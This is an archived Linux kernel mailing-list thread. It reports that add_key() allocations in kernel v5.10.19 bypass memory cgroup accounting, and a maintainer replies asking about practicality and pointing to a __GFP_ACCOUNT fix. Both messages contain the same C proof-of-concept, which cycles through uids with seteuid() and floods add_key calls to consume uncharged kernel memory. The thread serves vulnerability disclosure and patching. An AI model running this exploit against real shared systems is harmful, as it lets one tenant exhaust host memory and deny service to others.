linux-mm.kvack.org archive mirror
 help / color / mirror / Atom feed
* add_key() syscall can lead to bypassing memcg limits
@ 2021-03-28  2:30 杨昱天
  2021-03-29  7:39 ` Michal Hocko
  0 siblings, 1 reply; 2+ messages in thread
From: 杨昱天 @ 2021-03-28  2:30 UTC (permalink / raw)
  To: hannes, mhocko, vdavydov.dev; +Cc: cgroups, linux-mm, shenwenbosmile

[-- Attachment #1: Type: text/plain, Size: 2776 bytes --]

Hi, our team has found a bug in key_alloc() on Linux kernel v5.10.19, which leads to bypassing memcg limits.
The bug is caused by the code snippets listed below:

/*--------------- key.c --------------------*/
...
276/* allocate and initialise the key and its description */
277key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
278if (!key)
279goto no_memory_2;
...
/*---------------- end ---------------------*/

/*------------- keyctl.c -------------------*/
...
95  if (_description) {
96description = strndup_user(_description, KEY_MAX_DESC_SIZE);
97if (IS_ERR(description)) {
...
/*--------------- end ---------------------*/

Each user can allocate ~20KB uncharged memory by calling add_key syscall to trigger the listed code.
Code at line 277 in the first snippet allocates a new struct key object that is not charged by memcg, as no accouting flag is passed to neither the
allocation site here nor the key_jar's creating site. At line 96 in the second snippet, we found that memory used by description of a key, 
which has a maximum size of 4096 bytes, is also not charged. A user can allocate multiple keys and consume more uncharged memory. 
The upper limit of key memory's size is set to 20,000 bytes by default for each user.

The bug can cause severe memcg limit bypassing if a process can change its uid and bypass the above limit. For example, a user may own root privilege 
in its user namespace and leverage seteuid() syscall to continuously change its uid. 
Our evaluation on QEMU v5.1.0 + cgroup v2 shows that, under this assumption, we could consume ~2.2G memory by allocating keys from 100,000 different uids, while the memory charged by memcg is ~215MB.

The PoC code is listed below:

/*--------------- PoC --------------------*/
#include <asm/unistd.h>
#include <linux/keyctl.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>

char desc[4000];
void alloc_key_user(int id) {
  int i = 0, times = -1;
  __s32 serial = 0;
  int res_uid = seteuid(id);
  if (res_uid == 0)
    printf("uid allocation success on id %d!\n", id);
  else {
    printf("uid allocation failed on id %d!\n", id);
    return;
  }
  srand(time(0));
  while (serial != 0xffffffff) {
    ++times;
    for (i = 0; i < 3900; ++i)
      desc[i] = rand()%255 + 1;
    desc[i] = '\0';
    serial = syscall(__NR_add_key, "user", desc, "payload",
      strlen("payload"), KEY_SPEC_SESSION_KEYRING);
  }
  printf("allocation happened %d times.\n", times);
  seteuid(0);
}

int main() {
  int loop_times = 0;
  int start_uid = 0;
  scanf("%d %d", &start_uid, &loop_times);
  for (int i = 0; i < loop_times; ++i) {
    alloc_key_user(i+start_uid);
  }
  return 0;
}

/*-------------PoC end ---------------------*/

Thanks!

Best regards,
Yutian Yang

[-- Attachment #2: Type: text/html, Size: 11397 bytes --]

^ permalink raw reply	[flat|nested] 2+ messages in thread

* Re: add_key() syscall can lead to bypassing memcg limits
  2021-03-28  2:30 add_key() syscall can lead to bypassing memcg limits 杨昱天
@ 2021-03-29  7:39 ` Michal Hocko
  0 siblings, 0 replies; 2+ messages in thread
From: Michal Hocko @ 2021-03-29  7:39 UTC (permalink / raw)
  To: 杨昱天
  Cc: hannes, vdavydov.dev, cgroups, linux-mm, shenwenbosmile,
	David Howells, Jarkko Sakkinen, James Morris, Serge E. Hallyn,
	keyrings, linux-security-module

Cc keyctl maintainers

On Sun 28-03-21 10:30:34, 杨昱天 wrote:
> Hi, our team has found a bug in key_alloc() on Linux kernel v5.10.19, which leads to bypassing memcg limits.
> The bug is caused by the code snippets listed below:
> 
> /*--------------- key.c --------------------*/
> ...
> 276/* allocate and initialise the key and its description */
> 277key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
> 278if (!key)
> 279goto no_memory_2;
> ...
> /*---------------- end ---------------------*/
> 
> /*------------- keyctl.c -------------------*/
> ...
> 95  if (_description) {
> 96description = strndup_user(_description, KEY_MAX_DESC_SIZE);
> 97if (IS_ERR(description)) {
> ...
> /*--------------- end ---------------------*/
> 
> Each user can allocate ~20KB uncharged memory by calling add_key syscall to trigger the listed code.
> Code at line 277 in the first snippet allocates a new struct key object that is not charged by memcg, as no accouting flag is passed to neither the
> allocation site here nor the key_jar's creating site. At line 96 in the second snippet, we found that memory used by description of a key, 
> which has a maximum size of 4096 bytes, is also not charged. A user can allocate multiple keys and consume more uncharged memory. 
> The upper limit of key memory's size is set to 20,000 bytes by default for each user.
> 
> The bug can cause severe memcg limit bypassing if a process can change its uid and bypass the above limit. For example, a user may own root privilege 
> in its user namespace and leverage seteuid() syscall to continuously change its uid. 
> Our evaluation on QEMU v5.1.0 + cgroup v2 shows that, under this assumption, we could consume ~2.2G memory by allocating keys from 100,000 different uids, while the memory charged by memcg is ~215MB.

Can the user/attacker create all those different uids? Or what would be
a typical scenario where this a threat? In other words is this a
practical attack vector?

If yes then the mitigation woulld be quite easy for the key_jar (just
add __GFP_ACCOUNT). I am not aware we would have strndup_user
alternative with kemecg enabled so this would have to be added.

> 
> The PoC code is listed below:
> 
> /*--------------- PoC --------------------*/
> #include <asm/unistd.h>
> #include <linux/keyctl.h>
> #include <unistd.h>
> #include <stdio.h>
> #include <string.h>
> #include <stdlib.h>
> #include <time.h>
> 
> char desc[4000];
> void alloc_key_user(int id) {
>   int i = 0, times = -1;
>   __s32 serial = 0;
>   int res_uid = seteuid(id);
>   if (res_uid == 0)
>     printf("uid allocation success on id %d!\n", id);
>   else {
>     printf("uid allocation failed on id %d!\n", id);
>     return;
>   }
>   srand(time(0));
>   while (serial != 0xffffffff) {
>     ++times;
>     for (i = 0; i < 3900; ++i)
>       desc[i] = rand()%255 + 1;
>     desc[i] = '\0';
>     serial = syscall(__NR_add_key, "user", desc, "payload",
>       strlen("payload"), KEY_SPEC_SESSION_KEYRING);
>   }
>   printf("allocation happened %d times.\n", times);
>   seteuid(0);
> }
> 
> int main() {
>   int loop_times = 0;
>   int start_uid = 0;
>   scanf("%d %d", &start_uid, &loop_times);
>   for (int i = 0; i < loop_times; ++i) {
>     alloc_key_user(i+start_uid);
>   }
>   return 0;
> }
> 
> /*-------------PoC end ---------------------*/
> 
> Thanks!
> 
> Best regards,
> Yutian Yang

-- 
Michal Hocko
SUSE Labs


^ permalink raw reply	[flat|nested] 2+ messages in thread

end of thread, other threads:[~2021-03-29  7:39 UTC | newest]

Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2021-03-28  2:30 add_key() syscall can lead to bypassing memcg limits 杨昱天
2021-03-29  7:39 ` Michal Hocko

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).